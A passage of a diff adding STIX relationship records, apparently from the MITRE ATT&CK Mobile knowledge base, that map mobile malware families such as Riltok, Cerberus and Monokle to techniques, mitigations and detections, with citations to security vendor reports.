"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Kaspersky Riltok June 2019", + "url": "https://securelist.com/mobile-banker-riltok/91374/", + "description": "Tatyana Shishkova. (2019, June 25). Riltok mobile Trojan: A banker with global reach. Retrieved August 7, 2019." + } + ], + "modified": "2019-09-15T15:36:42.312Z", + "description": "[Riltok](https://attack.mitre.org/software/S0403) can retrieve a list of installed applications. Installed application names are then checked against an adversary-defined list of targeted applications.(Citation: Kaspersky Riltok June 2019)", + "relationship_type": "uses", + "source_ref": "malware--c0efbaae-9e7d-4716-a92d-68373aac7424", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--edfb68d0-5efd-4fb5-93f9-c432535686cb", + "created": "2019-09-04T15:38:56.881Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "CyberMerchants-FlexiSpy", + "description": "Actis B. (2017, April 22). FlexSpy Application Analysis. Retrieved September 4, 2019.", + "url": "http://www.cybermerchantsofdeath.com/blog/2017/04/22/FlexiSpy.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T19:56:00.761Z", + "description": "[FlexiSpy](https://attack.mitre.org/software/S0408) can collect device contacts.(Citation: CyberMerchants-FlexiSpy)", + "relationship_type": "uses", + "source_ref": "tool--1622fd3d-fcfc-4d02-ac49-f2d786f79b81", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--fb62afa9-d593-44f8-840d-bd5c595a1228", + "created": "2022-04-01T18:44:46.780Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "An EMM/MDM can use the Android `DevicePolicyManager.setPermittedAccessibilityServices` method to set an explicit list of applications that are allowed to use Android's accessibility features.", + "modified": "2022-04-01T18:44:46.780Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--649f7268-4c12-483b-ac84-4b7bca9fe2ee", + "target_ref": "attack-pattern--dc01774a-d1c1-45fb-b506-0a5d1d6593d9", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--f857935b-653a-4b9a-a2dc-59c042059a39", + "created": "2023-03-20T15:56:04.673Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T15:56:04.673Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--764ee29e-48d6-4934-8e6b-7a606aaaafc0", + "target_ref": "attack-pattern--986f80f7-ff0e-4f48-87bd-0394814bbce5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--eb6dbe2a-6f76-4bce-ab37-66ec67148041", + "type": "relationship", + "created": "2017-10-25T14:48:53.742Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2020-06-24T15:08:18.481Z", + "description": "Enterprise policies should prevent enabling USB debugging on Android devices unless specifically needed (e.g., if the device is used for application development).", + "relationship_type": "mitigates", + "source_ref": "course-of-action--649f7268-4c12-483b-ac84-4b7bca9fe2ee", + "target_ref": "attack-pattern--667e5707-3843-4da8-bd34-88b922526f0d", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--455b1287-5784-42b4-91fb-01dac007758d", + "created": "2020-09-29T13:24:15.234Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Lookout-Dendroid", + "url": "https://blog.lookout.com/blog/2014/03/06/dendroid/", + "description": "Marc Rogers. (2014, March 6). Dendroid malware can take over your camera, record audio, and sneak into Google Play. Retrieved December 22, 2016." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Dendroid](https://attack.mitre.org/software/S0301) can open a dialog box to ask the user for passwords.(Citation: Lookout-Dendroid)", + "modified": "2022-04-12T10:01:44.682Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--317a2c10-d489-431e-b6b2-f0251fddc88e", + "target_ref": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--e7b7e813-4867-46fe-bf86-6f367553d765", + "type": "relationship", + "created": "2019-11-21T16:42:48.456Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "GReAT. (2019, June 26). ViceLeaker Operation: mobile espionage targeting Middle East. Retrieved November 21, 2019.", + "url": "https://securelist.com/fanning-the-flames-viceleaker-operation/90877/", + "source_name": "SecureList - ViceLeaker 2019" + }, + { + "source_name": "Bitdefender - Triout 2018", + "url": "https://labs.bitdefender.com/2018/08/triout-spyware-framework-for-android-with-extensive-surveillance-capabilities/", + "description": "L. Arsene, C. Ochinca. (2018, August 20). Triout – Spyware Framework for Android with Extensive Surveillance Capabilities. Retrieved January 21, 2020." + } + ], + "modified": "2020-01-21T14:20:50.455Z", + "description": "[ViceLeaker](https://attack.mitre.org/software/S0418) can copy arbitrary files from the device to the C2 server, can exfiltrate browsing history, can exfiltrate the SD card structure, and can exfiltrate pictures as the user takes them.(Citation: SecureList - ViceLeaker 2019)(Citation: Bitdefender - Triout 2018)", + "relationship_type": "uses", + "source_ref": "malware--6fcaf9b0-b509-4644-9f93-556222c81ed2", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--aa40d01f-0741-4bf2-bacd-75e1f3a77af0", + "created": "2022-04-01T16:52:03.322Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-01T16:52:03.322Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--9c049d7b-c92a-4733-9381-27e2bd2ccadc", + "target_ref": "attack-pattern--08ea902d-ecb5-47ed-a453-2798057bb2d3", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--950e1476-83ca-4e81-b542-c91a19b206d7", + "type": "relationship", + "created": "2020-04-24T17:46:31.466Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SecurityIntelligence TrickMo", + "url": "https://securityintelligence.com/posts/trickbot-pushing-a-2fa-bypass-app-to-bank-customers-in-germany/", + "description": "P. Asinovsky. (2020, March 24). TrickBot Pushing a 2FA Bypass App to Bank Customers in Germany. Retrieved April 24, 2020." + } + ], + "modified": "2020-04-24T17:46:31.466Z", + "description": "[TrickMo](https://attack.mitre.org/software/S0427) can collect device information such as network operator, model, brand, and OS version.(Citation: SecurityIntelligence TrickMo)", + "relationship_type": "uses", + "source_ref": "malware--21170624-89db-4e99-bf27-58d26be07c3a", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ad0c873b-9e45-44e0-adaf-529921ee7a77", + "type": "relationship", + "created": "2020-06-26T15:32:25.035Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Threat Fabric Cerberus", + "url": "https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html", + "description": "Threat Fabric. (2019, August). Cerberus - A new banking Trojan from the underworld. Retrieved June 26, 2020." + }, + { + "source_name": "CheckPoint Cerberus", + "url": "https://research.checkpoint.com/2020/mobile-as-attack-vector-using-mdm/", + "description": "A. Hazum, B. Melnykov, C. Efrati, D. Golubenko, I. Wernik, L. Kuperman, O. Mana. (2020, April 29). First seen in the wild – Malware uses Corporate MDM as attack vector. Retrieved June 26, 2020." + } + ], + "modified": "2020-06-26T15:32:25.035Z", + "description": "[Cerberus](https://attack.mitre.org/software/S0480) can collect device information, such as the default SMS app and device locale.(Citation: Threat Fabric Cerberus)(Citation: CheckPoint Cerberus)", + "relationship_type": "uses", + "source_ref": "malware--037f44f0-0c07-4c7f-b40e-0325b5b228a9", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--81e1311e-4fe1-4177-ae12-1d50037c5e4f", + "created": "2020-06-02T14:32:31.906Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Volexity Insomnia", + "url": "https://www.volexity.com/blog/2020/04/21/evil-eye-threat-actor-resurfaces-with-ios-exploit-and-updated-implant/", + "description": "A. Case, D. Lassalle, M. Meltzer, S. Koessel, et al.. (2020, April 21). Evil Eye Threat Actor Resurfaces with iOS Exploit and Updated Implant. Retrieved June 2, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[INSOMNIA](https://attack.mitre.org/software/S0463) has communicated with the C2 using HTTPS requests over ports 43111, 43223, and 43773.(Citation: Volexity Insomnia)", + "modified": "2022-04-20T16:40:05.898Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--21b7e0b0-0dea-4ccc-8ad4-8da51fe3a901", + "target_ref": "attack-pattern--948a447c-d783-4ba0-8516-a64140fcacd5", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--3f2daf2e-c28c-46cd-bf91-ae35e873f365", + "created": "2019-09-04T14:28:15.950Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout-Monokle", + "description": "Bauer A., Kumar A., Hebeisen C., et al. (2019, July). Monokle: The Mobile Surveillance Tooling of the Special Technology Center. Retrieved September 4, 2019.", + "url": "https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:35:59.273Z", + "description": "[Monokle](https://attack.mitre.org/software/S0407) can delete arbitrary files on the device, and can also uninstall itself and clean up staging files.(Citation: Lookout-Monokle)", + "relationship_type": "uses", + "source_ref": "malware--6a7aaab1-3e0a-48bb-ba66-bbf7665c0a65", + "target_ref": "attack-pattern--ab7400b7-3476-4776-9545-ef3fa373de63", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--42536c96-ae61-41ab-a1bf-3e7d126a4000", + "created": "2022-03-30T15:13:42.462Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-03-30T15:13:42.462Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--c6e17ca2-08b5-4379-9786-89bd05241831", + "target_ref": "attack-pattern--670a4d75-103b-4b14-8a9e-4652fa795edd", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--694857ba-92e8-462e-8900-a9f6fdcf495d", + "type": "relationship", + "created": "2020-12-31T18:25:05.133Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "CYBERWARCON CHEMISTGAMES", + "url": "https://www.youtube.com/watch?v=xoNSbm1aX_w", + "description": "B. Leonard, N. Mehta. (2019, November 21). The Secret Life of Sandworms. Retrieved December 31, 2020." + } + ], + "modified": "2020-12-31T18:25:05.133Z", + "description": "[CHEMISTGAMES](https://attack.mitre.org/software/S0555) has encrypted its DEX payload.(Citation: CYBERWARCON CHEMISTGAMES)", + "relationship_type": "uses", + "source_ref": "malware--a0d774e4-bafc-4292-8651-3ec899391341", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--4943cca6-69b1-4565-ac09-87ebda04584c", + "created": "2022-04-01T18:52:02.211Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Users should be taught the dangers of rooting or jailbreaking their device.", + "modified": "2022-04-01T18:52:02.211Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--2aa78dfd-cb6f-4c70-9408-137cfd96be49", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--0b1aae4b-4dcd-41b6-a708-1441e5a24070", + "created": "2022-04-15T17:18:44.185Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "Talos Gustuff Apr 2019", + "url": "https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html", + "description": "Vitor Ventura. (2019, April 9). Gustuff banking botnet targets Australia . Retrieved September 3, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Gustuff](https://attack.mitre.org/software/S0406) obfuscated command information using a custom base85-based encoding.(Citation: Talos Gustuff Apr 2019)", + "modified": "2022-04-15T17:18:44.185Z", + "relationship_type": "uses", + "source_ref": "malware--ff8e0c38-be47-410f-a2d3-a3d24a87c617", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--bc0d2cbb-30fa-40e6-a250-bf6e5d8f9005", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Kaspersky-Skygofree", + "url": "https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603/", + "description": "Nikita Buchka and Alexey Firsh. (2018, January 16). Skygofree: Following in the footsteps of HackingTeam. Retrieved September 24, 2018." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Skygofree](https://attack.mitre.org/software/S0327) can be controlled via binary SMS.(Citation: Kaspersky-Skygofree)", + "modified": "2022-04-19T14:25:41.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--3a913bac-4fae-4d0e-bca8-cae452f1599b", + "target_ref": "attack-pattern--ec4c4baa-026f-43e8-8f56-58c36f3162dd", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--2908f0f6-2408-41a1-aaab-cf3e7db06aad", + "created": "2020-12-24T21:55:56.752Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020.", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:26:16.282Z", + "description": "[DoubleAgent](https://attack.mitre.org/software/S0550) has used exploits to root devices and install additional malware on the system partition.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--3d6c4389-3489-40a3-beda-c56e650b6f68", + "target_ref": "attack-pattern--4f14e30b-8b57-4a7b-9093-2c0778ea99cf", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--5c447471-2b97-4d96-b75f-1cbb574b39cf", + "created": "2023-03-20T15:46:49.646Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T15:46:49.646Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--cc6e0637-76d2-4af3-a604-9d8d3ff8a6b3", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--aaf55dd1-33df-4f02-8025-eaae01f30b33", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout-EnterpriseApps", + "description": "Lookout. (2016, May 25). 5 active mobile threats spoofing enterprise apps. Retrieved December 19, 2016.", + "url": "https://blog.lookout.com/blog/2016/05/25/spoofed-apps/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T19:53:38.161Z", + "description": "[AndroRAT](https://attack.mitre.org/software/S0292) collects contact list information.(Citation: Lookout-EnterpriseApps)", + "relationship_type": "uses", + "source_ref": "malware--a3dad2be-ce62-4440-953b-00fbce7aba93", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--82f12052-783e-40e4-8079-d9c030c310fd", + "created": "2022-03-30T20:08:40.223Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Android and iOS include system partition integrity mechanisms that could detect unauthorized modifications. ", + "modified": "2022-03-30T20:08:40.223Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--7b1cf46f-784b-405a-a8dd-4624c19d8321", + "target_ref": "attack-pattern--46d818a5-67fa-4585-a7fc-ecf15376c8d5", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--e35b013b-89e8-41b3-a518-7737234ab71b", + "type": "relationship", + "created": "2020-01-27T17:05:58.312Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "E. Xu, G. Guo. (2019, June 28). Mobile Cyberespionage Campaign ‘Bouncing Golf’ Affects Middle East. Retrieved January 27, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/", + "source_name": "Trend Micro Bouncing Golf 2019" + } + ], + "modified": "2020-01-27T17:05:58.312Z", + "description": "[GolfSpy](https://attack.mitre.org/software/S0421) can take screenshots.(Citation: Trend Micro Bouncing Golf 2019)", + "relationship_type": "uses", + "source_ref": "malware--c19cfc89-5ac6-4d2d-a236-70d2b32e007c", + "target_ref": "attack-pattern--73c26732-6422-4081-8b63-6d0ae93d449e", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--5b670281-0054-42b4-8e54-ea01a692f5bf", + "type": "relationship", + "created": "2021-10-01T14:42:48.900Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SecureList BusyGasper", + "url": "https://securelist.com/busygasper-the-unfriendly-spy/87627/", + "description": "Alexey Firsh. (2018, August 29). BusyGasper – the unfriendly spy. Retrieved October 1, 2021." + } + ], + "modified": "2021-10-01T14:42:48.900Z", + "description": "[BusyGasper](https://attack.mitre.org/software/S0655) can open a hidden menu when a specific phone number is called from the infected device.(Citation: SecureList BusyGasper)", + "relationship_type": "uses", + "source_ref": "malware--e110f94a-e2c5-4f5f-ba78-9c2ab6d2d9e4", + "target_ref": "attack-pattern--351ddf79-2d3a-41b4-9bef-82ea5d3ccd69", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--67c2b73d-cd51-4894-a7bd-fdd5d14b33a2", + "created": "2019-09-03T20:08:00.704Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Talos Gustuff Apr 2019", + "url": "https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html", + "description": "Vitor Ventura. (2019, April 9). Gustuff banking botnet targets Australia . Retrieved September 3, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Gustuff](https://attack.mitre.org/software/S0406) code is both obfuscated and packed with an FTT packer.(Citation: Talos Gustuff Apr 2019)", + "modified": "2022-04-15T17:18:58.074Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--ff8e0c38-be47-410f-a2d3-a3d24a87c617", + "target_ref": "attack-pattern--51636761-2e35-44bf-9e56-e337adf97174", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--759a2e09-32b6-4857-9b6d-adf5dcee142b", + "type": "relationship", + "created": "2020-12-14T15:02:35.286Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Securelist Asacub", + "url": "https://securelist.com/the-rise-of-mobile-banker-asacub/87591/", + "description": "T. Shishkova. (2018, August 28). The rise of mobile banker Asacub. Retrieved December 14, 2020." + } + ], + "modified": "2020-12-14T15:02:35.286Z", + "description": "[Asacub](https://attack.mitre.org/software/S0540) can collect various pieces of device network configuration information, such as mobile network operator.(Citation: Securelist Asacub)", + "relationship_type": "uses", + "source_ref": "malware--a76b837b-93cc-417d-bf28-c47a6a284fa4", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ad2c8b49-bbfb-47dd-84bb-cd4dbc49a64c", + "type": "relationship", + "created": "2019-09-03T19:45:48.512Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SWB Exodus March 2019", + "url": "https://securitywithoutborders.org/blog/2019/03/29/exodus.html", + "description": "Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved September 3, 2019." + } + ], + "modified": "2019-09-11T13:25:19.210Z", + "description": "[Exodus](https://attack.mitre.org/software/S0405) Two attempts to connect to port 22011 to provide a remote reverse shell.(Citation: SWB Exodus March 2019)", + "relationship_type": "uses", + "source_ref": "malware--3049b2f2-e323-4cdb-91cb-13b37b904cbb", + "target_ref": "attack-pattern--948a447c-d783-4ba0-8516-a64140fcacd5", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--0bc73eaf-a771-4ed0-b1f9-081ff4ca73ad", + "created": "2023-03-20T18:55:03.385Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:55:03.385Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--069b2328-442b-491e-962d-d3fe01f0549e", + "created": "2019-09-04T14:28:15.479Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Lookout-Monokle", + "url": "https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf", + "description": "Bauer A., Kumar A., Hebeisen C., et al. (2019, July). Monokle: The Mobile Surveillance Tooling of the Special Technology Center. Retrieved September 4, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Monokle](https://attack.mitre.org/software/S0407) can be controlled via email and SMS from a set of \"control phones.\"(Citation: Lookout-Monokle)", + "modified": "2022-04-19T14:25:41.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--6a7aaab1-3e0a-48bb-ba66-bbf7665c0a65", + "target_ref": "attack-pattern--ec4c4baa-026f-43e8-8f56-58c36f3162dd", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": 